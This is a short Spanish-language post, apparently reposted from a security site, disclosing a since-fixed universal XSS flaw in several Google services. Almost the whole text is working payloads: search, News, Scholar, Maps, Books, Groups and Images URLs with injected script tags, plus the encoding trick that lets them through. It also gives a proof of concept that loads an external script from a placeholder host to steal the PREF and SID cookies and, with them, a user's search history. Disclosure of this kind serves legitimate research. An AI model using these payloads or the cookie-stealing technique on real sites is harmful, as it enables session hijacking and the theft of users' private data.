Ha sido corregida .

Universal Google XSS. Descubierto y reportado por rMrGvG

XSS:

Debemos cambiar la codificacion de las variables ie y oe a unicode para pasar <script> como tal .

&ie=UTF8&oe=UTF8 ----------------> &ie=unicode&oe=unicode

<script>alert(\'rmrgvg\')</script>&hl=es&lr=&sa=N&ie=unicode&oe=unicode
<script src=\"http://url/script\"></script>&ie=unicode&oe=unicode

Universal XSS:

http://news.google.es/news?q=><script>alert(\'rmrgvg\')</script>adiosgoogle&hl=es&lr=&sa=N&ie=unicode&oe=unicode
http://www.google.es/search?hl=es&q=<script>alert(\'rMrGvG\')</script>&ie=unicode&oe=unicode
http://scholar.google.es/scholar?q=<script>alert(\'rmrgvg\')</script>&ie=unicode&oe=unicode&hl=es&lr=&btnG=B%C3%BAsqueda&lr=
http://maps.google.es/maps?f=q&hl=es&q=<script>alert(\'rmrgvg\')</script>&hl=es&lr=&sa=N&ie=unicode&oe=unicode&sll=40.396764,-3.713379&sspn=15.118685,29.619141&ie=unicode&z=5&om=1
http://groups.google.com.sv/group/Mir-Google/search?group=Mir-Google&q=<script>alert(\'rMrGvG\')</script>&hl=es&lr=&sa=N&ie=unicode&oe=unicode
http://books.google.es/books?q=<script>alert(\'rmrgvg\')</script>&hl=es&lr=&sa=N&ie=unicode&oe=unicode
http://books.google.es/books?q=<script>alert(\'rmrgvg\')</script>&hl=es&lr=&sa=N&ie=unicode&oe=unicode
http://images.google.es/images?q=script>alert(\'rmrgvg\')</script>&ie=unicode&oe=unicode&svnum=10&hl=es&start=21&sa=N

También los buscadores google de las páginas ajenas :http://www.google.es/custom?sitesearch=.......

Robo de cookies (algunos problemas con caracter como. o -),se solucionan con http://url/script
script = script.js (sin .js) si no pasa como %20 .
Conseguimos robar la cookie local (for spain google.es) las claves PREF y SID, de esta manera podemos robar el historiald e busquedas.
:O.

XSS:
<script src=\"http://url/script\"></script>&ie=unicode&oe=unicode

POC:
http://www.google.es/search?hl=es&q=<script src=\"http://url/script\"></script>&ie=unicode&oe=unicode

fuente:

http://sni-labs.com